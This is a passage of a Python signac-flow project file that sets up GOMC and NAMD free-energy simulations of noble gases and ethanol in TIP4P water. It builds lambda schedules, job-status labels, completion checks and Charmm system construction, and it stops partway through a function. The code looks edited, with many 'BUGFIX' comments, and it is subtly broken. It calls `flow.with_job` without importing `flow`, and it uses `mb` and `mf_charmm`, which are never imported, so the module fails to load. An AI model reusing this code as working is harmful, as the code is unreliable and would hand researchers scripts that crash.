from alchemlyb.parsing.gomc import extract_dHdl, extract_u_nk
from alchemlyb.estimators import MBAR, BAR, TI
import alchemlyb.preprocessing.subsampling as ss
import pandas as pd
import numpy as np
import os
import unyt as u
from flow import FlowProject, aggregator
from flow.environment import DefaultSlurmEnvironment
from src.utils.forcefields import get_ff_path
from src.utils.forcefields import get_molecule_path
from templates.NAMD_conf_template import generate_namd_equilb_control_file
class Project(FlowProject):
    """Subclass of FlowProject to provide custom methods and attributes."""

    def __init__(self):
        # No custom state yet -- defer entirely to FlowProject's initialization.
        super().__init__()
class Grid(DefaultSlurmEnvironment):  # Grid(StandardEnvironment):
    """Subclass of DefaultSlurmEnvironment for WSU's Grid cluster."""

    # Hosts whose name matches this pattern select this environment.
    hostname_pattern = r".*\.grid\.wayne\.edu"
    # Submission-script template used for this cluster.
    template = "grid.sh"
# ******************************************************
# users typical variables, but not all (start)
# ******************************************************

# Paths to the GOMC and NAMD binaries (the bin folder). If the binaries are
# callable directly from the terminal without a path, use an empty string
# (i.e., "" or '').

# WSU grid binary paths
gomc_binary_path = "/wsu/home/go/go24/go2432/wolf/GOMC/bin"
namd_binary_path = "/wsu/home/go/go24/go2432/NAMD_2.14_Linux-x86_64-multicore-CUDA"

# brads workstation binary paths
#gomc_binary_path = "/home/brad/Programs/GOMC/GOMC_dev_1_21_22/bin"
#namd_binary_path = "/home/brad/Programs/NAMD/NAMD_2.14_RTX_3080_build_Source_CUDA"

# number of simulation steps (the values used for the paper are noted inline)
gomc_steps_equilb_design_ensemble = 10 * 10**6  # set value for paper = 10 * 10**6
gomc_steps_lamda_production = 50 * 10**6  # set value for paper = 50 * 10**6
gomc_output_data_every_X_steps = 100 * 10**3  # set value for paper = 100 * 10**3
gomc_free_energy_output_data_every_X_steps = 10 * 10**3  # set value for paper = 10 * 10**3

# Free energy calcs: the number of lambda spacings, which includes 0 to 1;
# the lambdas themselves are generated from this count.
number_of_lambda_spacing_including_zero_int = 11

# force field (FF) file basenames for all simulations in a job (no extensions)
namd_ff_filename_str = "in_namd_FF"
gomc_ff_filename_str = "in_gomc_FF"

# initial mosdef structure and coordinates basename (no extension)
mosdef_structure_box_0_name_str = "mosdef_box_0"

# NAMD melt/equilb NPT run: control file input and simulation output basename
# (no extension)
namd_equilb_NPT_control_file_name_str = "namd_equilb_NPT"

# GOMC equilb run in the design ensemble: control file input and simulation
# output basename (no extension)
gomc_equilb_design_ensemble_control_file_name_str = "gomc_equilb_design_ensemble"

# GOMC production run in the design ensemble: control file input and
# simulation output basename (no extension)
gomc_production_control_file_name_str = "gomc_production_run"

# Analysis (each replicate's averages): output text file placed directly in
# each replicate folder (.txt, .dat, etc)
output_replicate_txt_file_name_box_0 = "analysis_avg_data_box_0.txt"

# Analysis (averages and std. devs. across all replicates), including the
# extension (.txt, .dat, etc)
output_avg_std_of_replicates_txt_file_name_box_0 = "analysis_avg_std_of_replicates_box_0.txt"

# scheduler walltimes (hours) and memory (GB) per operation type
walltime_mosdef_hr = 24
walltime_namd_hr = 24
walltime_gomc_equilbrium_hr = 72
walltime_gomc_production_hr = 368
walltime_gomc_analysis_hr = 4
memory_needed = 16

# force field (FF) xml filename for each residue
forcefield_residue_to_ff_filename_dict = {
    "TIP4": "tip4p_2005.xml",
    "Ne": "nobel_gas_vrabec_LB_mixing.xml",
    "Rn": "nobel_gas_vrabec_LB_mixing.xml",
    "ETOH": "trappe-ua.xml",
}

# molecule input for each residue: either a .mol2 filename or a SMILES string
smiles_or_mol2_name_to_value_dict = {
    "TIP4": 'tip4p.mol2',
    "Ne": "Ne",
    "Rn": "Rn",
    "ETOH": "ethanol.mol2",
}

# resolve each residue's molecule input via get_molecule_path
# (index [0] feeds "use_smiles", index [1] feeds "smiles_or_mol2")
smiles_or_mol2 = {
    str(residue_i): {
        "use_smiles": get_molecule_path(
            str(smiles_or_mol2_name_to_value_dict[str(residue_i)]))[0],
        "smiles_or_mol2": get_molecule_path(
            str(smiles_or_mol2_name_to_value_dict[str(residue_i)]))[1],
    }
    for residue_i in smiles_or_mol2_name_to_value_dict
}

# resolve each residue's FF xml filename to its full path
forcefield_dict = {
    str(residue_i): get_ff_path(forcefield_residue_to_ff_filename_dict[str(residue_i)])
    for residue_i in forcefield_residue_to_ff_filename_dict
}

print("*********************")
print("*********************")
print("smiles_or_mol2 = " + str(smiles_or_mol2))
print("forcefield_dict = " + str(forcefield_dict))
print("*********************")
print("*********************")

# ******************************************************
# users typical variables, but not all (end)
# ******************************************************

# ******************************************************
# signac and GOMC-MOSDEF code (start)
# ******************************************************

# ******************************************************
# create some initial variable to be store in each jobs
# directory in an additional json file, and test
# to see if they are written (start).
# ******************************************************

# set the default directory
project_directory_path = str(os.getcwd())
print("project_directory_path = " + str(project_directory_path))

# ******************************************************
# functions for selecting/grouping/aggregating in different ways (start)
# ******************************************************
def statepoint_without_replica(job):
    """Return the job's statepoint as sorted (key, value) pairs, excluding the replica number."""
    excluded = {"replica_number_int"}
    selected_keys = sorted(k for k in job.sp.keys() if k not in excluded)
    return [(k, job.sp[k]) for k in selected_keys]
def statepoint_without_temperature(job):
    """Return the job's statepoint as sorted (key, value) pairs, excluding the production temperature."""
    excluded = {"production_temperature_K"}
    selected_keys = sorted(k for k in job.sp.keys() if k not in excluded)
    return [(k, job.sp[k]) for k in selected_keys]
# ******************************************************
# ******************************************************
# functions for selecting/grouping/aggregating in different ways (end)
# ******************************************************
# ******************************************************
# ******************************************************
# ******************************************************
# functions for free energy calcs MBAR, TI, and BAR for getting delta free energy and delta error (start)
# ******************************************************
# ******************************************************
def get_delta_TI_or_MBAR(TI_or_MBAR_estimate, k_b_T):
    """Return (delta_G, std_delta_G) for a TI or MBAR estimator.

    The estimator's free-energy matrices are in reduced units (k_B*T), so
    both the end-to-end difference and its standard deviation are scaled out.
    """
    free_energy = TI_or_MBAR_estimate.delta_f_.iloc[0, -1]
    std_free_energy = TI_or_MBAR_estimate.d_delta_f_.iloc[0, -1]
    return free_energy * k_b_T, std_free_energy * k_b_T
def get_delta_BAR(BAR_estimate, k_b_T):
    """Return (delta_G, std_delta_G) for a BAR estimator.

    BAR only provides adjacent-state errors, so the total error is the
    quadrature sum of the superdiagonal of d_delta_f_.
    """
    n_states = len(BAR_estimate.d_delta_f_)
    variance = sum(
        BAR_estimate.d_delta_f_.values[i][i + 1] ** 2 for i in range(n_states - 1)
    )
    delta = BAR_estimate.delta_f_.iloc[0, -1] * k_b_T
    std_delta = k_b_T * variance ** 0.5
    return delta, std_delta
# ******************************************************
# ******************************************************
# functions for free energy calcs MBAR, TI, and BAR for getting delta free energy and delta error (end)
# ******************************************************
# ******************************************************
@Project.label
def part_1a_initial_data_input_to_json(job):
    """Check that the initial job data is written to the json files."""
    # BUGFIX: the original wrote f"{"signac_job_document.json"}", which nests
    # double quotes inside a double-quoted f-string -- a SyntaxError on every
    # Python before 3.12 (PEP 701) -- and the f-string was pointless anyway.
    return job.isfile("signac_job_document.json")
@Project.post(part_1a_initial_data_input_to_json)
@Project.operation.with_directives(
    {
        "np": 1,
        "ngpu": 0,
        "memory": memory_needed,
        "walltime": walltime_mosdef_hr,
    }
)
@flow.with_job
def initial_parameters(job):
    """Set the initial job parameters into the jobs doc json file.

    Builds the VDW lambda schedule for the free-energy calculation, records
    the production state point (ensemble, T, P, box size, cutoffs), selects
    the CPU/GPU resources for NAMD and GOMC, and stores which NAMD/GOMC
    binaries each simulation stage should use.
    """
    # Free energy calcs: generate evenly spaced lambdas covering [0, 1]
    # (inclusive) and the matching initial-state indices.
    LambdaVDW_list = []
    InitialState_list = []
    # loop-invariant spacing, hoisted out of the loop
    lambda_space_increments = 1 / int(number_of_lambda_spacing_including_zero_int - 1)
    for lamda_i in range(0, int(number_of_lambda_spacing_including_zero_int)):
        LambdaVDW_list.append(np.round(lamda_i * lambda_space_increments, decimals=8))
        InitialState_list.append(lamda_i)

    print("*********************")
    print("*********************")
    print("LambdaVDW_list = " + str(LambdaVDW_list))
    print("InitialState_list = " + str(InitialState_list))
    print("*********************")
    print("*********************")

    # BUGFIX: this check used 'and', which only raised when BOTH endpoints
    # were wrong; either a missing 0 start OR a missing 1 end is invalid.
    if LambdaVDW_list[0] != 0 or LambdaVDW_list[-1] != 1:
        raise ValueError("ERROR: The selected lambda list values do not start with a 0 and end 1.")

    job.doc.LambdaVDW_list = LambdaVDW_list
    job.doc.InitialState_list = InitialState_list

    # set the GOMC production ensemble temp, pressure, molecule, box dimension and residue names
    job.doc.production_ensemble = "NVT"
    job.doc.production_pressure_bar = (1 * u.atm).to('bar')
    job.doc.production_temperature_K = job.sp.production_temperature_K
    job.doc.N_liquid_solvent = 1000
    job.doc.N_liquid_solute = 1
    job.doc.liq_box_lengths_ang = 31.07 * u.angstrom
    job.doc.Rcut_ang = 15 * u.angstrom  # this is the Rcut for GOMC it is the Rswitch for NAMD
    job.doc.Rcut_for_switch_namd_ang = 17 * u.angstrom  # Switch Rcut for NAMD's Switch function
    job.doc.neighbor_list_dist_namd_ang = 22 * u.angstrom  # NAMD's neighbor list

    # Replica RNG seeds: an identity mapping for replicas 0..20 (an unknown
    # replica number would store None, as with the original lookup table).
    replica_no_to_seed_dict = {replica_i: replica_i for replica_i in range(21)}

    job.doc.replica_number_int = replica_no_to_seed_dict.get(
        int(job.sp.replica_number_int)
    )

    # set solvent and solute in doc
    job.doc.solvent = "TIP4"
    job.doc.solute = job.sp.solute

    # set the CPU/GPU resources for the supported solvent/solute combinations
    if job.doc.solvent in ["TIP4", "TIP3"] and job.doc.solute in ["He", "Ne", "Kr", "Ar", "Xe", "Rn", "ETOH"]:
        job.doc.namd_node_ncpu = 1
        job.doc.namd_node_ngpu = 1
        job.doc.gomc_ncpu = 1  # 1 is optimal but I want data quick. run time is set for 1 cpu
        job.doc.gomc_ngpu = 1
    else:
        # MESSAGE FIX: original text was garbled ("do are not set up to selected").
        raise ValueError(
            "ERROR: The solvent and solute are not set up to select the mixing rules or electrostatics "
        )

    # get the namd binary paths
    if job.doc.namd_node_ngpu == 0:
        job.doc.namd_cpu_or_gpu = "CPU"
    elif job.doc.namd_node_ngpu == 1:
        job.doc.namd_cpu_or_gpu = "GPU"
    else:
        # MESSAGE FIX: "Tee" -> "The", "is is" -> "is".
        raise ValueError(
            "The NAMD CPU and GPU can not be determined as force field (FF) is not available in the selection, "
            "or GPU selection is not 0 or 1."
        )

    # get the gomc binary paths
    if job.doc.gomc_ngpu == 0:
        job.doc.gomc_cpu_or_gpu = "CPU"
    elif job.doc.gomc_ngpu == 1:
        job.doc.gomc_cpu_or_gpu = "GPU"
    else:
        raise ValueError(
            "The GOMC CPU and GPU can not be determined as force field (FF) is not available in the selection, "
            "or GPU selection is not 0 or 1."
        )

    # set the initial iteration number of the simulation
    job.doc.gomc_equilb_design_ensemble_dict = {}
    job.doc.gomc_production_run_ensemble_dict = {}

    # Binaries per stage: NAMD equilibration always uses namd2; GOMC
    # equilibration always uses the NPT binary, while production uses the
    # binary matching the selected production ensemble.
    if job.doc.production_ensemble == "NPT":
        job.doc.namd_equilb_NPT_gomc_binary_file = "namd2"
        job.doc.gomc_equilb_design_ensemble_gomc_binary_file = f"GOMC_{job.doc.gomc_cpu_or_gpu}_NPT"
        job.doc.gomc_production_ensemble_gomc_binary_file = f"GOMC_{job.doc.gomc_cpu_or_gpu}_NPT"
    elif job.doc.production_ensemble == "NVT":
        job.doc.namd_equilb_NPT_gomc_binary_file = "namd2"
        job.doc.gomc_equilb_design_ensemble_gomc_binary_file = f"GOMC_{job.doc.gomc_cpu_or_gpu}_NPT"
        job.doc.gomc_production_ensemble_gomc_binary_file = f"GOMC_{job.doc.gomc_cpu_or_gpu}_NVT"
    else:
        raise ValueError(
            "ERROR: The 'GCMC', 'GEMC_NVT', 'GEMC_NPT' ensembles is not currently available for this project.py "
        )
# ******************************************************
# ******************************************************
# create some initial variable to be store in each jobs
# directory in an additional json file, and test
# to see if they are written (end).
# ******************************************************
# ******************************************************
# ******************************************************
# ******************************************************
# check if GOMC psf, pdb, and force field (FF) files were written (start)
# ******************************************************
# ******************************************************
# check if GOMC-MOSDEF wrote the gomc files
# @Project.pre(select_production_ensemble)
@Project.label
@flow.with_job
def mosdef_input_written(job):
    """Check that the mosdef files (psf, pdb, and force field (FF) files) are written."""
    required_files = (
        f"{namd_ff_filename_str}.inp",
        f"{gomc_ff_filename_str}.inp",
        f"{mosdef_structure_box_0_name_str}.psf",
        f"{mosdef_structure_box_0_name_str}.pdb",
    )
    return all(job.isfile(filename) for filename in required_files)
# ******************************************************
# ******************************************************
# check if GOMC psf, pdb, and FF files were written (end)
# ******************************************************
# ******************************************************
# ******************************************************
# ******************************************************
# check if GOMC control file was written (start)
# ******************************************************
# ******************************************************
# function for checking if the GOMC control file is written
def gomc_control_file_written(job, control_filename_str):
    """General check that the gomc control files are written."""
    control_file = f"{control_filename_str}.conf"
    if not job.isfile(control_file):
        return False

    found_output_name = False
    with open(job.fn(control_file), "r") as conf_fp:
        for line in conf_fp:
            # A written GOMC control file contains an 'OutputName' directive.
            if line.split()[:1] == ["OutputName"]:
                found_output_name = True
    return found_output_name
# function for checking if the NAMD control file is written
def namd_control_file_written(job, control_filename_str):
    """General check that the NAMD control files are written."""
    control_file = f"{control_filename_str}.conf"
    if not job.isfile(control_file):
        return False

    found_cell_basis = False
    with open(job.fn(control_file), "r") as conf_fp:
        for line in conf_fp:
            # A written NAMD control file declares its cell basis vectors.
            if line.split()[:1] == ["cellBasisVector1"]:
                found_cell_basis = True
    return found_cell_basis
# checking if the NAMD control file is written for the melt equilb NVT run
@Project.label
@flow.with_job
def part_2a_namd_equilb_NPT_control_file_written(job):
    """General check that the namd_equilb_NPT_control_file
    (high temperature to set temp NAMD control file) is written."""
    is_written = namd_control_file_written(job, namd_equilb_NPT_control_file_name_str)
    return is_written
# checking if the GOMC control file is written for the equilb run with the selected ensemble
@Project.label
@flow.with_job
def part_2b_gomc_equilb_design_ensemble_control_file_written(job):
    """General check that the gomc_equilb_design_ensemble (run temperature) gomc control file is written.

    True only when a control file exists for every initial state.
    """
    try:
        for initial_state_i in list(job.doc.InitialState_list):
            try:
                # BUGFIX: the original discarded this boolean, so the label
                # reported True as soon as the doc entry existed, even when
                # the control file itself had not been written yet.
                if not gomc_control_file_written(
                    job,
                    job.doc.gomc_equilb_design_ensemble_dict[
                        str(initial_state_i)
                    ]["output_name_control_file_name"],
                ):
                    return False
            except Exception:
                # A missing doc entry means this state is not written yet.
                # (bare 'except:' narrowed to Exception)
                return False
        return True
    except Exception:
        # job.doc.InitialState_list is not populated yet.
        return False
# checking if the GOMC control file is written for the production run
@Project.label
@flow.with_job
def part_2c_gomc_production_control_file_written(job):
    """General check that the gomc_production_control_file (run temperature) is written.

    True only when a control file exists for every initial state.
    """
    try:
        for initial_state_i in list(job.doc.InitialState_list):
            try:
                # BUGFIX: the original 'return'ed the result for the FIRST
                # initial state immediately, never checking the later states;
                # check every state, as part_2b does.
                if not gomc_control_file_written(
                    job,
                    job.doc.gomc_production_run_ensemble_dict[
                        str(initial_state_i)
                    ]["output_name_control_file_name"],
                ):
                    return False
            except Exception:
                # A missing doc entry means this state is not written yet.
                return False
        return True
    except Exception:
        # job.doc.InitialState_list is not populated yet.
        return False
# ******************************************************
# ******************************************************
# check if GOMC control file was written (end)
# ******************************************************
# ******************************************************
# ******************************************************
# ******************************************************
# check if GOMC simulations started (start)
# ******************************************************
# ******************************************************
# function for checking if GOMC simulations are started
def gomc_simulation_started(job, control_filename_str):
    """General check to see if the gomc simulation is started."""
    # GOMC writes its console log and the merged psf early in the run, so
    # both existing means the run has started.
    console_log = "out_{}.dat".format(control_filename_str)
    merged_psf = "{}_merged.psf".format(control_filename_str)
    return bool(job.isfile(console_log) and job.isfile(merged_psf))
# function for checking if NAMD simulations are started
def namd_simulation_started(job, control_filename_str):
    """General check to see if the namd simulation is started."""
    # NAMD writes its console log and its restart .xsc early in the run, so
    # both existing means the run has started.
    console_log = "out_{}.dat".format(control_filename_str)
    restart_xsc = "{}.restart.xsc".format(control_filename_str)
    return bool(job.isfile(console_log) and job.isfile(restart_xsc))
# check if melt equilb_NVT namd run is started
@Project.label
@flow.with_job
def part_3a_output_namd_equilb_NPT_started(job):
    """Check to see if the namd_equilb_NPT_control_file is started
    (high temperature to set temperature in NAMD control file)."""
    started = namd_simulation_started(job, namd_equilb_NPT_control_file_name_str)
    return started
# check if equilb_with design ensemble GOMC run is started
@Project.label
@flow.with_job
def part_3b_output_gomc_equilb_design_ensemble_started(job):
    """Check to see if the gomc_equilb_design_ensemble simulation is started (set temperature)."""
    try:
        for initial_state_i in list(job.doc.InitialState_list):
            try:
                output_name = job.doc.gomc_equilb_design_ensemble_dict[
                    str(initial_state_i)
                ]["output_name_control_file_name"]
                # BUGFIX: the original called gomc_simulation_started() but
                # discarded its result, so a run with a console log but no
                # merged psf still counted as "started". Use the boolean.
                if not gomc_simulation_started(job, output_name):
                    return False
            except Exception:
                # A missing doc entry means this state has not started yet.
                return False
        return True
    except Exception:
        # job.doc.InitialState_list is not populated yet.
        return False
# check if production GOMC run is started by seeing if the GOMC consol file and the merged psf exist
@Project.label
@flow.with_job
def part_part_3c_output_gomc_production_run_started(job):
    """Check to see if the gomc production run simulation is started (set temperature)."""
    # NOTE(review): the doubled 'part_part_' prefix looks like a typo, but the
    # name is the label's identity, so it is kept for compatibility.
    try:
        for initial_state_i in list(job.doc.InitialState_list):
            try:
                output_name = job.doc.gomc_production_run_ensemble_dict[
                    str(initial_state_i)
                ]["output_name_control_file_name"]
                # BUGFIX: the original called gomc_simulation_started() but
                # discarded its result; use the boolean it returns so a
                # missing merged psf is reported as "not started".
                if not gomc_simulation_started(job, output_name):
                    return False
            except Exception:
                # A missing doc entry means this state has not started yet.
                return False
        return True
    except Exception:
        # job.doc.InitialState_list is not populated yet.
        return False
# ******************************************************
# ******************************************************
# check if GOMC simulations started (end)
# ******************************************************
# ******************************************************
# ******************************************************
# ******************************************************
# check if GOMC and NAMD simulation are completed properly (start)
# ******************************************************
# ******************************************************
# function for checking if GOMC simulations are completed properly
def gomc_sim_completed_properly(job, control_filename_str):
    """General check to see if the gomc simulation was completed properly.

    The GOMC console log ends with a statistics table whose header starts
    with 'Move Type Mol. Kind'; the LAST line containing 'Move' decides.
    """
    job_run_properly_bool = False
    output_log_file = "out_{}.dat".format(control_filename_str)

    if job.isfile(output_log_file):
        with open(job.fn(f"{output_log_file}"), "r") as fp:
            for line in fp:
                if "Move" in line:
                    tokens = line.split()
                    # ROBUSTNESS FIX: the original indexed tokens[1..3]
                    # unconditionally after matching tokens[0], raising
                    # IndexError on a short line containing just 'Move'.
                    job_run_properly_bool = tokens[:4] == ["Move", "Type", "Mol.", "Kind"]

    return job_run_properly_bool
# function for checking if NAMD simulations are completed properly
def namd_sim_completed_properly(job, control_filename_str):
    """General check to see if the namd simulation was completed properly.

    A finished NAMD log ends with a 'WallClock: ... CPUTime: ... Memory: ...'
    summary line; the LAST line containing 'WallClock:' decides.
    """
    job_run_properly_bool = False
    output_log_file = "out_{}.dat".format(control_filename_str)

    if job.isfile(output_log_file):
        with open(job.fn(f"{output_log_file}"), "r") as fp:
            for line in fp:
                if "WallClock:" in line:
                    tokens = line.split()
                    # ROBUSTNESS FIX: the original indexed tokens[2] and
                    # tokens[4] unconditionally, raising IndexError on short
                    # lines containing 'WallClock:'.
                    job_run_properly_bool = (
                        len(tokens) >= 5
                        and tokens[0] == "WallClock:"
                        and tokens[2] == "CPUTime:"
                        and tokens[4] == "Memory:"
                    )

    return job_run_properly_bool
# check if melt equilb NVT GOMC run completed by checking the end of the GOMC consol file
@Project.label
@flow.with_job
def part_4a_job_namd_equilb_NPT_completed_properly(job):
    """Check to see if the namd_equilb_NPT_control_file was completed properly
    (high temperature to set temperature NAMD control file)."""
    # BUGFIX: the original ran the (log-file-reading) check twice and threw
    # the first result away; run it once and return that result.
    return namd_sim_completed_properly(job, namd_equilb_NPT_control_file_name_str)
# check if equilb selected ensemble GOMC run completed by checking the end of the GOMC consol file
@Project.label
@flow.with_job
def part_4b_job_gomc_equilb_design_ensemble_completed_properly(job):
    """Check to see if the gomc_equilb_design_ensemble simulation was completed properly (set temperature)."""
    try:
        for initial_state_i in list(job.doc.InitialState_list):
            try:
                filename_4b_iter = job.doc.gomc_equilb_design_ensemble_dict[
                    str(initial_state_i)
                ]["output_name_control_file_name"]
                # IDIOM: 'not ...' instead of '... is False'.
                if not gomc_sim_completed_properly(job, filename_4b_iter):
                    print("gomc_equilb_design_ensemble incomplete state " + str(initial_state_i))
                    return False
            except Exception:
                # Bare 'except:' narrowed to Exception (it also swallowed
                # KeyboardInterrupt/SystemExit); missing doc entry => not done.
                return False
        return True
    except Exception:
        # job.doc.InitialState_list is not populated yet.
        return False
# check if production GOMC run completed by checking the end of the GOMC consol file
@Project.label
@flow.with_job
def part_4c_job_production_run_completed_properly(job):
    """Check to see if the gomc production run simulation was completed properly (set temperature)."""
    try:
        for initial_state_i in list(job.doc.InitialState_list):
            try:
                filename_4c_iter = job.doc.gomc_production_run_ensemble_dict[
                    str(initial_state_i)
                ]["output_name_control_file_name"]
                # IDIOM: 'not ...' instead of '... is False'.
                if not gomc_sim_completed_properly(job, filename_4c_iter):
                    print("Isn't finished ", filename_4c_iter)
                    return False
                # check specifically for the FE files
                if not job.isfile(f'Free_Energy_BOX_0_{filename_4c_iter}.dat'):
                    print("Isn't finished ", f'Free_Energy_BOX_0_{filename_4c_iter}.dat')
                    return False
            except Exception:
                # Bare 'except:' narrowed to Exception; missing doc entry
                # means this state is not done yet.
                return False
        return True
    except Exception:
        # job.doc.InitialState_list is not populated yet.
        return False
# ******************************************************
# ******************************************************
# check if GOMC and NAMD simulation are completed properly (end)
# ******************************************************
# ******************************************************
# ******************************************************
# ******************************************************
# check if GOMC anaylsis is completed properly (start)
# ******************************************************
# ******************************************************
# check if analysis is done for the individual replicates wrote the gomc files
@Project.pre(part_4c_job_production_run_completed_properly)
@Project.label
@flow.with_job
def part_5a_analysis_individual_simulation_averages_completed(job):
    """Check that the individual simulation averages files are written."""
    return bool(job.isfile(output_replicate_txt_file_name_box_0))
# check if analysis for averages of all the replicates is completed
@Project.pre(part_5a_analysis_individual_simulation_averages_completed)
@Project.label
def part_5b_analysis_replica_averages_completed(*jobs):
    """Check that the simulation replicate average and std. dev. files are written."""
    # True only when every aggregated job sees the combined-replicates file
    # (vacuously True for an empty aggregate, matching the original).
    return all(
        job.isfile(f"../../analysis/{output_avg_std_of_replicates_txt_file_name_box_0}")
        for job in jobs
    )
# ******************************************************
# ******************************************************
# check if GOMC anaylsis is completed properly (end)
# ******************************************************
# ******************************************************
# ******************************************************
# ******************************************************
# build system, with option to write the force field (force field (FF)), pdb, psf files.
# Note: this is needed to write GOMC control file, even if a restart (start)
# ******************************************************
# build system
def build_charmm(job, write_files=True):
    """Build the Charmm object and potentially write the pdb, psd, and force field (FF) files.

    Parameters
    ----------
    job : signac.contrib.job.Job
        Job whose statepoint/doc provide solute, solvent, molecule counts,
        box length, production ensemble, and the replica seed.
    write_files : bool, default True
        When True, write the GOMC/NAMD FF (.inp) files plus the NAMD
        psf/pdb files; when False, only construct and return the objects.

    Returns
    -------
    list
        [namd_charmm, gomc_charmm] mf_charmm.Charmm objects.
    """
    print("#**********************")
    print("Started: GOMC Charmm Object")
    print("#**********************")
    # Seed mb.fill_box with the replica number so replicates differ.
    mbuild_box_seed_no = job.doc.replica_number_int
    solvent = mb.load(smiles_or_mol2[job.doc.solvent]['smiles_or_mol2'],
                      smiles=smiles_or_mol2[job.doc.solvent]['use_smiles']
                      )
    solvent.name = job.doc.solvent
    # NOTE(review): TIP4 is skipped here, presumably because the rigid
    # 4-site water model cannot be energy minimized this way — confirm.
    if job.doc.solvent not in ["TIP4"]:
        solvent.energy_minimize(forcefield=forcefield_dict[job.doc.solvent], steps=10 ** 5)
    # Noble-gas solutes are single-particle compounds; anything else is
    # loaded from a SMILES string or mol2 file.
    # NOTE(review): this branch mixes job.sp.solute and job.doc.solute —
    # presumably the doc mirrors the statepoint; verify.
    if job.sp.solute in ["He", "Ne", "Kr", "Ar", "Xe", "Rn"]:
        solute = mb.Compound(name=job.doc.solute)
    else:
        solute = mb.load(smiles_or_mol2[job.sp.solute]['smiles_or_mol2'],
                         smiles=smiles_or_mol2[job.sp.solute]['use_smiles']
                         )
    solute.name = job.sp.solute
    # only put the FF molecules in the simulation in the dictionaly input into the Chamm object.
    minimal_forcefield_dict = {solute.name: forcefield_dict[solute.name],
                               solvent.name: forcefield_dict[solvent.name]
                               }
    solute.energy_minimize(forcefield=forcefield_dict[job.sp.solute], steps=10 ** 5)
    bead_to_atom_name_dict = {
        "_LP": "LP",
    }
    residues_list = [solute.name, solvent.name]
    print("residues_list = " +str(residues_list ))
    # Water models keep rigid bonds/angles in GOMC (fixed, not sampled).
    if job.doc.solvent in ["TIP4", "TIP3"]:
        gomc_fix_bonds_angles_residues_list = [solvent.name]
    else:
        gomc_fix_bonds_angles_residues_list = None
    print('Running: filling liquid box')
    box_0 = mb.fill_box(compound=[solute, solvent],
                        n_compounds=[job.doc.N_liquid_solute, job.doc.N_liquid_solvent],
                        box=[u.unyt_quantity(job.doc.liq_box_lengths_ang, 'angstrom').to_value("nm"),
                             u.unyt_quantity(job.doc.liq_box_lengths_ang, 'angstrom').to_value("nm"),
                             u.unyt_quantity(job.doc.liq_box_lengths_ang, 'angstrom').to_value("nm"),
                             ],
                        seed=mbuild_box_seed_no
                        )
    print('Completed: filling liquid box')
    print('Running: GOMC FF file, and the psf and pdb files')
    # Two Charmm objects are built: NAMD keeps flexible waters (NAMD handles
    # rigidity itself), GOMC gets the fixed bonds/angles list.
    if job.doc.production_ensemble in ["NVT", "NPT"]:
        print('Running: namd_charmm')
        namd_charmm = mf_charmm.Charmm(
            box_0,
            mosdef_structure_box_0_name_str,
            structure_box_1=None,
            filename_box_1=None,
            ff_filename= namd_ff_filename_str,
            forcefield_selection=minimal_forcefield_dict,
            residues=residues_list,
            bead_to_atom_name_dict=bead_to_atom_name_dict,
            gomc_fix_bonds_angles=None,
        )
        print('Running: gomc_charmm')
        gomc_charmm = mf_charmm.Charmm(
            box_0,
            mosdef_structure_box_0_name_str,
            structure_box_1=None,
            filename_box_1=None,
            ff_filename= gomc_ff_filename_str,
            forcefield_selection=minimal_forcefield_dict,
            residues=residues_list,
            bead_to_atom_name_dict=bead_to_atom_name_dict,
            gomc_fix_bonds_angles=gomc_fix_bonds_angles_residues_list,
        )
    else:
        raise ValueError("ERROR: The GCMC and GEMC ensembles are not supported in this script.")
    # The psf/pdb are written once (by the NAMD object); both FF files are written.
    if write_files == True:
        gomc_charmm.write_inp()
        namd_charmm.write_inp()
        namd_charmm.write_psf()
        namd_charmm.write_pdb()
    print("#**********************")
    print("Completed: GOMC Charmm Object")
    print("#**********************")
    return [namd_charmm, gomc_charmm]
# ******************************************************
# ******************************************************
# build system, with option to write the force field (FF), pdb, psf files.
# Note: this is needed to write GOMC control file, even if a restart (end)
# ******************************************************
# ******************************************************
# ******************************************************
# Creating GOMC files (pdb, psf, force field (FF), and gomc control files (start)
# ******************************************************
# ******************************************************
@Project.pre(part_1a_initial_data_input_to_json)
@Project.post(part_2a_namd_equilb_NPT_control_file_written)
@Project.post(part_2b_gomc_equilb_design_ensemble_control_file_written)
@Project.post(part_2c_gomc_production_control_file_written)
@Project.post(mosdef_input_written)
@Project.operation.with_directives(
    {
        "np": 1,
        "ngpu": 0,
        "memory": memory_needed,
        "walltime": walltime_mosdef_hr,
    }
)
@flow.with_job
def build_psf_pdb_ff_gomc_conf(job):
    """Build the Charmm object and write the pdb, psd, and force field (FF)
    files for all the simulations in the workspace.

    Per job this single operation writes:
      * the MoSDeF/Charmm FF, psf, and pdb input files,
      * the NAMD NPT-equilibration control file, and
      * one GOMC equilibration and one GOMC production control file for
        every lambda initial state in job.doc.InitialState_list.
    """
    [namd_charmm_object_with_files, gomc_charmm_object_with_files] = build_charmm(job, write_files=True)
    # Free-energy settings shared by every GOMC control file below.
    FreeEnergyCalc = [True, int(gomc_free_energy_output_data_every_X_steps)]
    MoleculeType = [job.sp.solute, 1]
    use_ElectroStatics = True
    VDWGeometricSigma = False
    Exclude = "1-4"
    # common variables
    cutoff_style = "VDW"
    # Guard: the remainder of this operation hard-codes the VDW cutoff style.
    if cutoff_style != "VDW":
        raise ValueError("ERROR: this project is only set up for the SWITCH cutoff style for NAMD"
                         "and VDW for GOMC. Therefore, the cutoff style selected must be VDW. "
                         "Rswitch for namd only so the r_switch_dist_start and "
                         "r_switch_dist_end must be supplied for NAMD. GOMC will then move to VDW "
                         "with the switch dist (r_switch_dist_start) as the cutoff with LRC.")
    production_temperature_K = (job.sp.production_temperature_K * u.K).to_value("K")
    production_pressure_bar = (job.doc.production_pressure_bar * u.bar).to_value("bar")
    box_lengths_ang = [u.unyt_quantity(job.doc.liq_box_lengths_ang, 'angstrom').to_value("angstrom"),
                       u.unyt_quantity(job.doc.liq_box_lengths_ang, 'angstrom').to_value("angstrom"),
                       u.unyt_quantity(job.doc.liq_box_lengths_ang, 'angstrom').to_value("angstrom"),
                       ]
    seed_no = job.doc.replica_number_int
    namd_template_path_str = os.path.join(project_directory_path, "templates/NAMD_conf_template.conf")
    # Select NAMD's rigid-water handling for the water models.
    if job.doc.solvent in ["TIP3"] or job.sp.solute in ["TIP3"]:
        namd_uses_water = True
        namd_water_model = 'tip3'
    elif job.doc.solvent in ["TIP4"] or job.sp.solute in ["TIP4"]:
        namd_uses_water = True
        namd_water_model = 'tip4'
    else:
        namd_uses_water = False
        namd_water_model= None
    # generate the namd file
    # NOTE: the production and melt temps are converted to intergers so they can be ramped down
